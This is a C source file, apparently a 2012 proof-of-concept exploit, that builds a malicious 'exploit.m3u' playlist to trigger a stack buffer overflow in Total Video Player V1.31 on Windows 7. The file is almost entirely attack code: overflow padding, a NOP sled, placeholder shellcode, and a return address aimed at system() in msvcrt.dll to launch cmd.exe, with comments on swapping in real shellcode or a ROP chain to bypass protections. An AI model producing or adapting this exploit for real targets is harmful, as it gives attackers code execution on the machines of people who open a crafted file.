/*
28-08-2012 
Total Video Player V1.31 m3u playlist exploit
Local Exploit
Written by GoTr00t
Tested on Windows 7
aksuumit[at]hotmail.com
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>


int main()
{                          
    char exploit[3000];
    memset(exploit,0x00,sizeof(exploit));
    
    char overflow[304];
    memset(overflow,0x41,sizeof(overflow)-1);
    
    char nops[40];
    memset(nops,0x90,sizeof(nops));
    
    char shellcode[160];
    memset(shellcode,0x55,sizeof(shellcode)); 
    
    char HEADER[] = "#EXTM3U\n#EXTINF:,\n";
    
    // 7694B177 address of system in the msvcrt.dll 
    char newEIP[] = "\x77\xB1\x94\x76";
    
    strcpy(exploit,HEADER);
    strcat(exploit,"c:\\");
    strcat(exploit,overflow);
    strcat(exploit,nops);       
    strcat(exploit,shellcode); // fake shellcode because there are multiple ways to exploit this vulnerability you can place a shellcode here 
    strcat(exploit,newEIP);    // and use this EIP to jump to the shellcode  but for this example i use a return2dll technique
    strcat(exploit,"\x44\x44\x44\x44"); // junk or you can use this one to jump to another dll to execute so you can do a ROP to bypass protection
    
    // 7638BF27  cmd.exe
    strcat(exploit,"\x27\xBF\x38\x76");
    
    // Write a exploit playlist 
    FILE *fp = fopen("exploit.m3u","w");
    fprintf(fp,exploit);
    fclose(fp);
    
    printf("Exploit written!\n");
    
    return 0;    
}